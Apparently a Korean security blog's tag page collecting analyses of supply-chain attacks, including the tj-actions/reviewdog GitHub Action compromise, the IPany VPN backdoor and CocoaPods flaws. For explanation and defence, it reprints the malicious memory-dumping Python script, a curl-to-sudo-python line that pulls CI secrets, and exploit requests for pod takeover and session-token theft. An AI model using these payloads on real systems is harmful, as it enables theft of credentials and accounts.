'공급망 공격' 태그의 글 목록

공급망 공격

GitHub Action 공급망 공격 (CVE-2025-30066, CVE-2025-30154) 2025.03.20
국정원, 소프트웨어 공급망 보안 취약점 노린 북한 해킹 경고 2025.03.09
IPany VPN 공급망 공격 2025.01.26
PyPI 생태계에서 발견된 악성 캠페인, 패키지 삭제 정책 악용해 외 2건 2024.09.08 4
Typosquatting에 취약하여 악성코드에 노출되는 GitHub Actions 2024.09.08
Apple CocoaPods 공급망 공격 2024.07.03
금융보안원, ‘레드아이리스 인사이트 리포트 : Campaign ThirdEye’를 발간 2024.03.12
지니언스 NAC 업데이트 서버 해킹 2023.07.05

GitHub Action 공급망 공격 (CVE-2025-30066, CVE-2025-30154)

2025. 3. 20. 10:12

1. tj-actions/changed-files [1]

- 리포지토리에서 파일 변경 사항을 추적(감지)하는 용도로 활용

- 약 23,000개 이상의 리포지토리에서 사용중

2. reviewdog/action-setup [2][3]

- 코드 리뷰 및 정적 분석을 자동화하는 데 사용

3. 주요 내용

- 공격자는 GitHub Action reviewdog/action-setup@v1를 감염시킨 후 이를 통해 tj-actions/changed-files를 침투 [4][5][6]

> CI/CD 러너(Runner) 메모리 데이터를 덤프해 환경 변수와 비밀 키를 로그에 기록하도록 조작

> 이로 인해 AWS 액세스 키, 깃허브 개인 액세스 토큰(PAT), NPM 토큰, 개인 RSA 키 등이 외부로 노출될 수 있음

- 공격자는 reviewdog/action-setup@v1의 install.sh에 Based64로 인코딩된 Python 코드를 삽입(Hardcoded) [8]

> 해당 코드는 Runner.Worker 프로세스의 메모리에서 읽기 가능한 영역을 추출하여 덤프하는 코드

> CVE-2025-30154 (CVSS: 8.6)으로 지정 [9]

#!/usr/bin/env python3

# based on https://davidebove.com/blog/?p=1620

import sys
import os
import re

# 실행 중인 프로세스 중 'Runner.Worker' 문자열이 포함된 프로세스의 PID를 찾아 반환
def get_pid():
    # /proc 디렉터리에서 현재 실행 중인 모든 프로세스 PID 목록 가져오기
    pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]

    for pid in pids:
        try:
            # 각 프로세스의 cmdline (실행 명령어) 확인
            with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
                if b'Runner.Worker' in cmdline_f.read():  # Runner.Worker가 포함된 프로세스인지 확인
                    return pid
        except IOError:
            continue

    # 해당 프로세스가 없으면 예외 발생
    raise Exception('Can not get pid of Runner.Worker')


if __name__ == "__main__":
    # Runner.Worker 프로세스의 PID 찾기
    pid = get_pid()
    print(pid)

    # 해당 프로세스의 maps과 mem 파일 경로 지정
    map_path = f"/proc/{pid}/maps"
    mem_path = f"/proc/{pid}/mem"

    # map 파일 및 mem 파일 읽기
    with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
        # 메모리 매핑된 각 영역을 한 줄씩 읽음
        for line in map_f.readlines():
            # 정규 표현식으로 메모리 시작-끝 주소와 권한 정보 추출
            m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)

            # 읽기 권한이 있는 영역만 대상
            if m and m.group(3) == 'r':
                start = int(m.group(1), 16)  # 시작 주소
                end = int(m.group(2), 16)    # 끝 주소

                # 64비트 환경에서 파이썬 int로 처리할 수 없는 주소 건너뛰기
                if start > sys.maxsize:
                    continue

                # 메모리 파일 포인터를 해당 영역의 시작 위치로 이동
                mem_f.seek(start)
                
                try:
                    # 메모리 내용을 읽고 표준 출력으로 내보내기 (바이너리로)
                    chunk = mem_f.read(end - start)
                    sys.stdout.buffer.write(chunk)
                except OSError:
                    # 일부 영역은 읽을 수 없을 수 있음 → 무시하고 넘어감
                    continue

- 공격자는 덤프로 탈취한 자격증명을 도용해 tj-actions/changed-files를 침해한 것으로 판단됨

> 공격자는 Based64로 인코딩된 페이로드를 index.js에 삽입

> 해당 코드는 특정 URL에서 Python 코드를 다운 받아 실행한 후 Based64를 두 번 적용해 출력하는 코드

> CVE-2025-30066 (CVSS: 8.6)으로 지정 [10]

# 현재 OS 타입이 리눅스인 경우
if [[ "$OSTYPE" == "linux-gnu" ]]; then
# 특정 URL에서 memdump.py 다운로드 및 실행
# sudo 권한으로 실행
# 널 문자 제거 (tr -d '\0'), 특정 패턴 출력 (grep ~), 중복 제거 (sort -u), Based64 인코딩 두 번 적용 (base64 -w 0)
# 인코딩된 값 출력
  B64_BLOB=`curl -sSf hxxps://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  echo $B64_BLOB
else
  exit 0
fi

- 특정 URL의 Python 코드는 Runner.Worker 프로세스의 메모리에서 읽기 가능한 영역을 추출하여 출력

#!/usr/bin/env python3

import sys
import os
import re

# 실행 중인 프로세스 중 'Runner.Worker' 문자열이 포함된 프로세스의 PID를 찾아 반환하는 함수
def get_pid():
    # /proc 디렉터리에서 현재 실행 중인 모든 프로세스 PID 목록 가져오기 
    pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]

    for pid in pids:
        try:
            # 각 프로세스의 cmdline (실행 명령어) 확인
            with open(os.path.join('/proc', pid, 'cmdline'), 'rb') as cmdline_f:
                # Runner.Worker가 포함된 프로세스인지 확인
                if b'Runner.Worker' in cmdline_f.read():
                    # 찾으면 해당 PID 반환
                    return pid  
        except IOError:
            # 접근 불가한 PID는 무시
            continue

    # 찾지 못할 경우 예외 발생
    raise Exception('Can not get pid of Runner.Worker')  

if __name__ == "__main__":
    pid = get_pid()  # 대상 프로세스 PID 획득
    print(pid)  # 표준 출력으로 PID 출력 (bash 스크립트에서 사용)

    map_path = f"/proc/{pid}/maps"  # 메모리 매핑 정보 파일
    mem_path = f"/proc/{pid}/mem"   # 실제 메모리 접근 파일

    with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0) as mem_f:
        for line in map_f.readlines():  # 매핑된 메모리 영역 하나씩 확인
            m = re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)  # 시작-끝 주소, 권한 파싱
            if m and m.group(3) == 'r':  # 읽기 권한(r)이 있는 영역만
                start = int(m.group(1), 16)
                end = int(m.group(2), 16)

                if start > sys.maxsize:  # 64비트 환경에서 처리 불가한 주소 방지
                    continue

                mem_f.seek(start)  # 메모리 영역 시작점으로 이동

                try:
                    chunk = mem_f.read(end - start)  # 해당 메모리 영역 읽기
                    sys.stdout.buffer.write(chunk)   # 메모리 내용 바이너리로 출력 (bash에서 후속 처리)
                except OSError:
                    # 일부 보호된 메모리 영역 접근 불가 → 무시
                    continue

3. 대응방안

① Action 업데이트 적용 (or 대체 도구로 교체 or 사용 중단)

- tj-actions/changed-files의 경우 46.0.1 버전에서 취약점을 해결 [11]

> 대체 도구 사용 : tj-actions/changed-files 액션을 step-security/changed-files@v45 로 교체

> 또는 사용 중단

② Action 워크플로 실행 로그 감사

- 해당 기간 동안 Runner.Worker 관련 이상 활동 및 tj-actions/changed-files 또는 reviewdog/action-setup@v1 기록 확인

> “🐶 Preparing environment ...” 또는 [사진 5]의 문자열이 확인될 경우 악성코드가 실행된 것

③ 관련된 비밀 정보 모두 변경

- GitHub 개인 액세스 토큰 (PAT), AWS 키, NPM 토큰, RSA 키 등 모든 종류의 비밀 키 교체

④ GitHub Actions 버전 고정 : 커밋 해시로 고정

- 특정 커밋 해시를 사용해 버전 고정

⑤ GitHub 허용 목록 기능 활용

- 신뢰할 수 있는 GitHub Actions만 실행하도록 허용 목록 구성

⑥ Reviewdog 의존 Action 점검

- reviewdog/action-setup이 다른 reviewdog Action의 구성요소로 포함되어 있어 해당 Action들에 대한 확인 필요
> reviewdog/action-shellcheck
> reviewdog/action-composite-template
> reviewdog/action-staticcheck
> reviewdog/action-ast-grep
> reviewdog/action-typos

⑦ 관련 로그 삭제 또는 환경 초기화

- 워크플로우 실행 로그 등 관련 로그를 삭제하거나 초기 환경으로 초기화

4. 참고

[1] https://github.com/tj-actions/changed-files
[2] https://github.com/reviewdog/action-setup
[3] https://github.com/reviewdog/reviewdog
[4] https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised
[5] https://sysdig.com/blog/detecting-and-mitigating-the-tj-actions-changed-files-supply-chain-attack-cve-2025-30066/
[6] https://www.wiz.io/blog/new-github-action-supply-chain-attack-reviewdog-action-setup
[7] https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066
[8] https://github.com/reviewdog/action-setup/commit/f0d342
[9] https://nvd.nist.gov/vuln/detail/CVE-2025-30154
[10] https://nvd.nist.gov/vuln/detail/cve-2025-30066
[11] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71685&menuNo=205020
[12] https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066
[13] https://www.dailysecu.com/news/articleView.html?idxno=164623
[14] https://news.hada.io/topic?id=19770

'취약점 > Supply-Chain Attack' 카테고리의 다른 글

AWS ‘whoAMI’ 네임 혼동 공격 (0)	2025.03.02
IPany VPN 공급망 공격 (0)	2025.01.26
Apple CocoaPods 공급망 공격 (0)	2024.07.03
XZ Utils 라이브러리 백도어 (CVE-2024-3094) (0)	2024.04.01
리포재킹(Repojacking) 공격 (0)	2023.09.14

국정원, 소프트웨어 공급망 보안 취약점 노린 북한 해킹 경고

2025. 3. 9. 12:42

요약	- 국정원, 북한 해킹 조직이 주요 국가기관과 첨단 기업의 기밀 자료와 핵심 기술을 탈취하기 위해 고도화된 해킹 기법을 사용한다고 경고 - 북한 해킹 조직이 S/W 공급망 보안의 취약점을 집중적으로 공략하며, IT 용역업체와 IT 솔루션을 대상으로 한 해킹 시도가 증가하는 추세
내용	- 국정원, 북한의 S/W 공급망 보안 취약점을 노린 해킹 경고 > 북한 해킹 조직은 S/W 공급망을 대상으로 세 가지 주요 방식으로 공격 수행 ① IT 용역업체를 해킹해 해당 업체가 보유한 접속 권한을 활용해 기관과 기업의 내부망을 우회 침투 - 고객사 접속 권한이 있는 IT 용역업체의 보안이 취약하면 국가기관 및 기업의 보안체계가 잘 갖춰져 있더라도 피해에 고스란히 노출 > 24.10 북한 해킹 조직이 한 지방자치단체 전산망 유지보수를 담당하는 A사 직원 이메일을 해킹 > 해당 이메일에 저장된 서버 접속 계정을 탈취해 지자체의 전산망 원격관리 서버에 무단 접속한 사례 > IT 용역업체는 직원 보안 교육을 강화하고, 외부 접속 경로 차단과 인증 수단 강화 등 조치를 통해 보안 수준을 높여야 함 ② IT 솔루션과 소프트웨어의 취약점을 악용해 내부 시스템에 침투하는 방법 - 내부자료 통합 관리와 유통을 위해 사용되는 IT 솔루션이 공격당할 경우, 단 한 번의 침해로 대량의 내부 정보가 유출될 가능성이 큼 > 이번 달, 북한 해킹 조직이 방산 협력업체 D사의 전자결재 및 의사소통용 그룹웨어의 보안 취약점을 악용해 악성코드를 설치 > 이를 통해 직원 이메일과 네트워크 구성도 등 내부자료를 탈취하려 한 정황이 포착 > 소프트웨어 보안 패치를 적용하고, 인터넷을 통한 관리자 계정 접속을 차단하며, 정기적으로 취약점을 점검하는 등의 보안 조치가 필요 ③ 기관과 기업의 보안 관리 허점을 노려 공격하는 방식 - 유추하기 쉬운 초기 패스워드를 사용하거나, 직원들이 부주의로 해킹 이메일을 열람하는 등의 보안 허점이 북한 해킹 조직의 주요 공격 경로로 활용 > 25.02 북한 해킹 조직이 모바일 신분 확인업체 E사의 관리자 페이지가 인터넷을 통해 쉽게 접근할 수 있다는 점을 악용 > 보안 검색 엔진을 활용하여 해당 취약점을 분석한 후 관리자 권한을 탈취한 사례가 발생 > 기본 보안 수칙을 체크리스트로 만들어 정기적으로 점검하고, 보안 교육을 강화해 직원들의 보안 의식을 높이는 것이 필수적
기타	- 국정원은 북한 해킹 조직을 비롯한 사이버 위협 세력의 공격을 차단하기 위해 관련 위협 정보와 보안 권고문을 국가사이버안보센터(NCSC) 홈페이지와 KCTI(사이버위협정보공유시스템)를 통해 제공 - 소프트웨어 공급망 공격 > 한 번의 침해로도 광범위한 피해를 초래할 수 있어 IT 공급자와 사용자 모두 경각심을 가져야 함

보안뉴스

국정원, 소프트웨어 공급망 보안 취약점 노린 북한 해킹 경고 - 데일리시큐

국가정보원이 최근 북한 해킹 조직이 주요 국가기관과 첨단 기업의 기밀자료와 핵심 기술을 탈취하기 위해 고도화된 해킹 기법을 사용하고 있다고 경고했다. 국정원은 북한 해킹 조직이 소프트

www.dailysecu.com

NIS 국가정보원

대한민국 국가정보원 공식 홈페이지

www.nis.go.kr

'보안뉴스' 카테고리의 다른 글

PHP 원격 코드 실행 취약점, 전 세계적으로 악용 사례 급증...주의 (1)	2025.03.15
중국산 블루투스 칩, 비공개 명령어 몰래 탑재..전세계 IoT기기 백도어 공격 우려 외 2건 (0)	2025.03.11
LLM 학습 데이터에서 1만2천개 이상 API 키 및 비밀번호 노출 확인 (0)	2025.03.01
4만9천개 이상 보안 취약한 건물 출입 관리 시스템 온라인에 노출...심각한 위협 (0)	2025.03.01
280만 개 IP 주소 활용해 전 세계 VPN 장비 노린 대규모 공격 발생 (0)	2025.02.13

IPany VPN 공급망 공격

2025. 1. 26. 16:14

1. IPany VPN [1]

- 한국 VPN 제공업체

2. 주요내용

- PlushDaemon으로 명명된 중국 APT 그룹에의해 한국 VPN 공급 업체 IPany는 공급망 공격을 당함 [2]
> 공격자들은 합법적인 설치 프로그램에 SlowStepper 백도어를 삽입
> SlowStepper는 C++, Python, Go로 프로그래밍된 약 30개의 모듈로 구성된 대규모 툴킷을 갖추고 있음

- 사용자들은 VPN 다운로드 URL (hxxps://ipany[.]kr/download/IPanyVPNsetup.zip)에서 악성 파일을 다운
> 악성 IPanyVPNsetup.exe 설치 프로그램이 실행되면 여러 디렉토리를 생성하고, 정상 및 악성 파일을 모두 배포

- 공격 체인

순서	설명
IPanyVPNSetup.exe 실행	- AutoMsg.dll 로드 - 레지스트리를 등록해 (값 : %PUBLIC%\Documents\WPSDocuments\WPSManager\svcghost.exe) 부팅 시 악성 구성 요소 svcghost.exe가 실행되도록 함
IPanyVPNSetup.exe가 ExitProcess를 호출할 때 셸 코드로 실행 리다이렉션	- 셸 코드 : EncMgr.pkg를 메모리에 로드 및 실행 - EncMgr.pkg > %PUBLIC%\Documents에 2개의 디렉터리를 생성 (WPSDocuments, WPSManager)하고 NetNative.pkg, FeatureFlag.pkg에서 구성 요소를 추출 및 실행 > 추출 및 실행 순서 ⒜ NetNative.pkg에서 파일 추출 - %PUBLIC%\Documents\WPSDocuments\WPSManager\assist.dll (악성 파일) - %PUBLIC%\Documents\WPSDocuments\WPSManager\msvcr100.dll (정상 파일) - %PUBLIC%\Documents\WPSDocuments\WPSManager\PerfWatson.exe (정상 파일) - %PUBLIC%\Documents\WPSDocuments\WPSManager\svcghost.exe (악성 파일) ⒝ NetNative.pkg 삭제 ⒞ FeatureFlag.pkg를 winlogin.gif로 이동 > C:\ProgramData\Microsoft Shared\Filters\SystemInfo\winlogin.gif ⒟ assist.dll를 Winse.gif로 이동 > C:\ProgramData\Microsoft Shared\Filters\SystemInfo\Winse.gif ⒠ Winse.gif에서 lregdll.dll 추출 > %PUBLIC%\Documents\WPSDocuments\WPSManager\lregdll.dll ⒡ BootstrapCache.pkg를 Qmea.dat에 복사 > %PUBLIC%\Documents\WPSDocuments\WPSManager\Qmea.dat ⒢ ShellExecute API를 사용하여 svcghost.exe를 실행 및 종료
svcghost.exe	- PerfWatson.exe 프로세스를 모니터링해 실행 중이 아니면 PerfWatson.exe를 실행해 lregdll.dll를 사이드 로드 - lregdll.dll는 winlogin.gif에서 SlowStepper 백도어 로드

2.1 SlowStepper 백도어

- 합법적인 DNS 서버를 사용해 7051.gsm.360safe[.]company에 대한 TXT 레코드를 획득
> 쿼리는 TXT 레코드의 처음 6바이트가 특정 문자열과 일치하는지 확인하고, 일치할 경우 나머지 문자열(C&C IP 주소를 포함하는 인코딩된 암호화문(base64, AES) 추출

※ TXT 레코드 : 도메인 및 하위 도메인과 관련된 텍스트 정보를 저장하며, 주로 메일이 신뢰할 수 있는 출처에서 온 것인지 확인하는데 사용 (SPF, DKIM, DMARC) [3]

- 획득한 C&C IP로 연결을 시도하며, 실패 시 API를 사용해 대체 C&C IP 획득
> 연결 실패 시 : st.360safe[.]company 도메인에 gethostbyname API를 사용해 해당 도메인에 매핑된 IP 주소를 얻어 대체 C&C 서버로 사용
> 통신이 설정되면 HOST 정보(CPU 정보, 호스트 이름, 실행 중인 프로세스 목록, 설치된 애플리케이션 목록 등), 파일 삭제, 셸 모드 활성화 등의 명령을 처리
> 또한 Python, C/C++, Go 언어로 작성된 모듈을 로드하고 실행하는 기능 포함

※ gethostbyname API : 주어진 도메인 이름을 이용하여 해당 도메인의 IP 주소를 알아내는 데 사용 [4]

- IoC 목록 [5]

3. 참고

[1] https://ipany.kr/
[2] https://www.welivesecurity.com/en/eset-research/plushdaemon-compromises-supply-chain-korean-vpn-service/
[3] https://hippogrammer.tistory.com/363
[4] https://learn.microsoft.com/ko-kr/windows/win32/api/winsock2/nf-winsock2-gethostbyname
[5] https://github.com/eset/malware-ioc/tree/master/PlushDaemon
[6] https://www.bleepingcomputer.com/news/security/ipany-vpn-breached-in-supply-chain-attack-to-push-custom-malware/

'취약점 > Supply-Chain Attack' 카테고리의 다른 글

GitHub Action 공급망 공격 (CVE-2025-30066, CVE-2025-30154) (0)	2025.03.20
AWS ‘whoAMI’ 네임 혼동 공격 (0)	2025.03.02
Apple CocoaPods 공급망 공격 (0)	2024.07.03
XZ Utils 라이브러리 백도어 (CVE-2024-3094) (0)	2024.04.01
리포재킹(Repojacking) 공격 (0)	2023.09.14

PyPI 생태계에서 발견된 악성 캠페인, 패키지 삭제 정책 악용해 외 2건

2024. 9. 8. 20:57

요약	- PyPI 플랫폼에서 새로운 공급망 공격 시도인 Revival Hijack 적발 - PyPI의 패키지 삭제 관련 정책을 교묘하게 악용
내용	- PyPI 플랫폼에서 22,000개 이상의 패키지에 영향을 미치는 공급망 공격 Revival Hijack 확인 > PyPI에서 개발자가 자신의 패키지를 삭제한 경우, 누구나 동일한 이름으로 패키지를 생성할 수 있음 > 공격자는 이를 악용해 유명 패키지와 동일한 이름을 가진 악성 패키지를 등록 > 관련된 실험을 진행한 결과, PyPI 플랫폼에서는 아무런 경고도 발생하지 않음
기타	- PyPI은 이와 관련된 정책을 검토하는 중 > 해당 정책이 적용되기 전까지 다운로드하는 패키지를 철저히 검사하는 과정 필요

보안뉴스

PyPI 생태계에서 발견된 악성 캠페인, 패키지 삭제 정책 악용해

보안 외신 핵리드에 의하면 PyPI 플랫폼에서 새로운 공급망 공격 시도가 적발됐다고 한다. 이 캠페인의 이름은 리바이벌하이잭(Revival Hijack)이라고 하며, PyPI의 패키지 삭제 관련 정책을 교묘하게

www.boannews.com

New Supply Chain Attack "Revival Hijack" Risks Massive PyPI Takeovers

hackread.com

Revival Hijack - PyPI hijack technique exploited in the wild, puts 22K packages at risk

JFrog’s security research team continuously monitors open-source software registries, proactively identifying and addressing potential malware and vulnerability threats to foster a secure and reliable ecosystem for open-source software development and de

jfrog.com

Typosquatting에 취약하여 악성코드에 노출되는 GitHub Actions

2024. 9. 8. 20:56

요약	- Typosquatting을 이용한 공급망 공격은 오래전부터 인기 - CI/CD 솔루션 GitHub Actions이 Typosquatting에 취약한 것이 확인
내용	- CI/CD 솔루션 GitHub Actions이 Typosquatting에 취약 > 개발자가 알아차리지 못하는 사이에 애플리케이션이 악성코드를 실행하도록 만들 수 있음 > 누구나 임시 이메일 계정으로 GitHub 계정을 만들어 GitHub Action을 게시할 수 있기 때문에 가능 - GitHub Actions에서 Typosquatting를 악용한 약 198개의 파일이 발견
기타	- 이름과 출처를 신뢰할 수 있는지 확인

보안뉴스

GitHub Actions Vulnerable to Typosquatting, Exposing Developers to Hidden Malicious Code

Typosquatting in GitHub Actions is a rising security threat, risking software supply chain attacks.

thehackernews.com

'보안뉴스' 카테고리의 다른 글

독일 경찰이 정말로 토르 네트워크를 뚫었을까? 외 1건 (4)	2024.09.25
국정원 "2026년부터 전 공공분야에 국제표준암호 허용" 외 2건 (2)	2024.09.16
자동화 기술이 넘쳐나는 시대에 뜻밖의 제안, 수동 취약점 점검 (3)	2024.09.06
Synology가 제시하는 랜섬웨어 복구를 위한 7가지 전략 (3)	2024.09.01
노출된 .env 파일 하나가 쏘아올린 작은 공, 11만 개 도메인 공격으로 이어져 (0)	2024.08.24

Apple CocoaPods 공급망 공격

2024. 7. 3. 22:13

1. 개요

- Apple에서 나온 거의 모든 장비에 영향을 주는 10년간 방치되어 있다 발견 [1]
- 취약점은 종속성 관리자 CocoaPods 프로그램에서 발생 [2]
- 악용한 시도는 아직까지 확인되지 않았으며, 취약점은 패치됨

1.1 관련 용어

구분	설명
Pod	프로젝트의 Dependency 상황을 서술하고 있는 파일
Dependency(의존성)	소프트웨어를 구성하는 요소들끼리 상호 의존하는 관계
CocoaPods	Swift와 Objective-C 언어로 만들어진 애플리케이션들의 디펜던시 관리를 편리하게 해 주는 오픈소스로, 팟들을 관리
Swift	개발 언어 중 하나
Objective-C	개발 언어 중 하나
Trunk	코코아팟즈와 연결된 서버로, 팟들을 저장하고 관리

2. 주요내용

2.1 CocoaPods 마이그레이션

- 2014년 CocoaPods은 새롭게 구축한 Trunk 서버로 마이그레이션
- 마이그레이션으로 인해 모든 Pod의 소유자가 초기화
- Pod의 원 소유자들은 CocoaPods에 연락해 Pod에 대한 소유권을 주장
- 그러나 일부 Pod 소유자들은 소유권을 주장하지 않았고, 1,870개의 Pod가 주인 없이 방치

2.2 CVE-2024-38368 [3]

- 임의의 사용자가 방치된 Pod의 소유권을 획득할 수 있는 취약점 (CVSS: 9.3)

> 누구나 Pod에 접근 및 내용을 수정이 가능하여 악성코드 삽입 가능
> 방치된 Pod는 기본 CocoaPods 계정(unclaimed-pods[@]cocoapods.org)과 연결되어 있었음
> 또한, Pod의 소유권을 주장할 수 있는 공개 API 엔드포인트가 사용가능해 누구나 검증 없이 Pod의 소유권을 획득할 수 있었음

- 공격자는 해당 API에 대상 Pod를 포함한 간단한 CURL 요청을 통해 소유권 획득 가능

# Curl request for changing ownership of a targeted orphaned pod
curl -X 'POST' \
-H 'Host: trunk.cocoapods.org' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary 'owner[name]=EVA&email=research@evasec.io'
--data-binary 'pods[]=[TARGET_UNCLAIMED_POD]&button=SEND'
'hxxps://trunk.cocoapods.org/claims'

2.3 CVE-2024-38366 [4]

- 이메일 도메인의 MX 레코드 유효성을 확인하는 rfc-822 라이브러리에의해 발생하는 원격 코드 실행 취약점 (CVSS: 10.0)

> rfc-822 라이브러리는 MX 레코드 유효성 검증을 위해 셸 명령을 실행하여 이로 인해 원격 코드 실행이 가능해짐
> 익스플로잇에 성공시 모든 Pod 소유자들의 세션 토큰 덤프하고 클라이언트 트래픽 조작 가능하며, 서버 자체를 완전히 셧다운 시키는 것도 가능

① mx_records()
> 38행: 이메일 주소를 받아 모듈의 EMAIL 정규식 패턴과 비교하여 검증
> 41행: 제공된 이메일 주소에서 분할된 도메인 부분을 이용해 raw_mx_records() 호출
② raw_mx_records()
> 49~51행: 도메인 부분 수신 및 DNS MX 레코드 검증을 위해 host_mx() 호출
③ host_mx()
> 53~55행: 임의의 OS 명령 '/usr/bin/env host -t MX #{domain}'을 실행하고, 이를 사용자가 제공한 이메일의 도메인과 연결
> 적절한 검증 없이 제공된 이메일 주소에 대해 OS 명령을 실행하여 취약점 발생

[영상 1] 취약점 시연 영상 [5]

2.4 CVE-2024-38367 [6]

- 사용자들의 상호작용 없이 세션 인증 토큰을 탈취할 수 있는 제로클릭 취약점 (CVSS: 8.2)

> 취약점은 세션 유효성 검사 URL을 구성하는 sessions_controller 클래스의 'Trunk' 서버 소스 코드에 위치

① request.host_wth_port()
> 21행: 세션 검증 URL의 도메인 부분을 생성하며, 새 세션이 생성 및 생성된 링크가 이메일을 통해 전송
> request.host_wth_port()는 Host 헤더나 다른 환경 변수 값보다 X-Forwarded-Host 헤더를 우선시

- 공격자는 조작된 X-Forwarded-Host를 통해 스푸핑된 도메인이 포함된 세션 검증 URL을 생성 및 공격자 메일로 전송
> 공격자는 검증 URL을 통해 세션 토큰을 탈취할 수 있음

POST /api/v1/sessions HTTP/1.1
Host: trunk.cococapods.org
Content-Type: application/json; charset=utf-8
Accept: application/json; charset=utf-8
User-Agent: CocoaPods/1.12.1
Accept-Encoding: gzip, deflate
X-Forwarded-Host: research.evasec.io
Content-Length: 78

{
  "email":"research@evasec.io",
  "name":"EVAResearch",
  "description":null
}

3. 대응방안

- 패치 적용

구분	설명
CVE-2024-38368	23.09 commit 71be5440906b6bdfbc0bcc7f8a9 fec33367ea0f4
CVE-2024-38366	23.09 commit 001cc3a430e75a16307f5fd6cdff1363ad2f40f3
CVE-2024-38367	23.10 commit d4f66f49cedab449af56a21ab697b9f7b97

- 기타 방안

① 모든 CocoaPods 관리자와 개발자들이 항상 같은 버전의 podfile.lock 파일을 보유하고 있어야함

> 동기화를 제대로 해야 모든 구성원이 똑같이 사용할 수 있으며 비정상적인 것들을 일찍 발견할 수 있음

② Trunk 서버에 Pod을 하나 호스팅한 뒤 다운로드하여 내부적으로 보유하고 있는 Pod와 비교해 CRC 검사 수행

> 배포하려는 것과 보유하고 있는 것이 정말로 같은 파일인지 확인하는 것

③ 서드파티 코드를 쓰려면 여러 번 확인 과정을 거칠 것

④ 주인 없는 Pod 사용 여부 점검

⑤ 인기있는 Dependency를 사용해야 한다면 더더욱 주의를 기울이고 검사에 만전을 기해야 함

> 공격자들은 유명한 것들을 더 활발히 악용

4. 참고

[1] https://www.evasec.io/blog/eva-discovered-supply-chain-vulnerabities-in-cocoapods
[2] https://cocoapods.org/
[3] https://nvd.nist.gov/vuln/detail/CVE-2024-38368
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-38366
[5] https://www.youtube.com/watch?v=nO84n2v3ZyM
[6] https://nvd.nist.gov/vuln/detail/CVE-2024-38367
[7] https://www.boannews.com/media/view.asp?idx=131055&page=1&kind=1

'취약점 > Supply-Chain Attack' 카테고리의 다른 글

AWS ‘whoAMI’ 네임 혼동 공격 (0)	2025.03.02
IPany VPN 공급망 공격 (0)	2025.01.26
XZ Utils 라이브러리 백도어 (CVE-2024-3094) (0)	2024.04.01
리포재킹(Repojacking) 공격 (0)	2023.09.14
지니언스 NAC 업데이트 서버 해킹 (0)	2023.07.05

금융보안원, ‘레드아이리스 인사이트 리포트 : Campaign ThirdEye’를 발간

2024. 3. 12. 21:17

1. 개요

- 최근 수년간 소프트웨어 공급망을 통한 다양한 침해사고 발생

- 인프라를 운영하며 관련 법률에서 제정한 다양한 규정 준수 및 보안 인증 등을 위해 다양한 솔루션이 사용

- 솔루션 증가는 공격자 입장에서 더 많은 선택권이 주어지는 것이므로, 현재 사용되는 솔루션의 위험성을 인식할 필요

- 금보원은 공격자의 관점에서 모의해킹을 진행해 공급망 공격을 분석한 ‘레드아이리스 인사이트 리포트 : Campaign ThirdEye’를 발간 [1]

※ 내용의 민감성을 고려하여 요약본 게시

2. 주요 내용

2.1 3rd Party 솔루션 유형 분류

구분	설명
형태별 분류	- 단일 소프트웨어 형태 - 하드웨어와 소프트웨어가 포함된 어플라이언스 장비 형태
기능별 분류	- 업무용 솔루션: 그룹웨어 / 웹 메일 / 메신저 / 문서 편집 / 업무포탈 등 - 보안 솔루션: 통합인증 / 망분리 및 망연계 / 계정관리 / 서버접근통제 등

2.2 3rd Party 취약점 분석

구분

설명

파일 업로드 취약점

- 파일업로드 기능을 이용해 악의적인 웹쉘 파일을 업로드하는 취약점
> 웹쉘 업로드 성공시 구동하는 웹 서비스 권한으로 쉘 획득 및 후속 공격이 가능
> 게시판 모듈의 취약점을 악용한 사례가 가장 많이 발견(개발사 폐업, 지원 종료, 업데이트 미적용 등)

- 세부 사례
① 업로드 확장자 검증 미흡
> 대부분 최신 버전 에디터는 기본적으로 JSP 등 악의적인 파일 업로드를 방지하기 위해 확장자 제한
> 일부 구버전 게시판 에디터의 경우 별도 검증 없이 파일 첨부 기능을 제공

② 관리자 페이지를 통한 파일 업로드
> 관리용 기능에서는 별도의 보안 검증을 수행하지 않는 경우가 많음
> 실질적으로 관리자 페이지 및 URL이 노출되지 않더라도 추측 및 무작위 대입을 통해 URL 식별 가능
> 원활한 관리를 위해 원격 접근을 허용하는 경우 또한 존재

2.3 써드아이(ThirdEye) 캠페인

- 3rd Party 솔루션 모의해킹 시나리오를 심층 분석해 가상의 해킹작전 (오퍼레이션)으로 재구성

> 이와 연관된 모든 활동을 써드아이(ThirdEye) 캠페인으로 명명

> 공격자 관점으로 시나리오별 세부적인 TTPs를 공유해 효율적으로 선제적 대응을 할 수 있도록 지원하는 것이 목표

- 오퍼레이션별 TTPs 프로파일링

구분	설명
초기 침투	- 초기 침투시 공통적으로 파일 업로드 활용 - 각각 테스트 페이지, 에디터, 파일 전송 모듈을 찾아 악용
지속성 유지	- 재접속을 위해 웹쉘, SSH 많이 이용 - 비밀번호 변경 없이 SSH 키를 등록하거나, 관리자 계정을 생성하는 방법을 주로 사용
인증정보	- WAS 설정 파일을 복호화하여 DB 접속 정보, 관리자 계정 정보 등 탈취
접근 네트워크 확장	- 정상 프로토콜을 악용해 터널링 생성 - 주로 HTTP와 SSH 터널링을 활용 - 터널링을 맺게 되면 연결된 포트를 통해 패킷이 경유지를 거쳐 방화벽을 우회하여 직접 접근하지 못하던 네트워크에 접근이 가능 (=네트워크 피보팅)
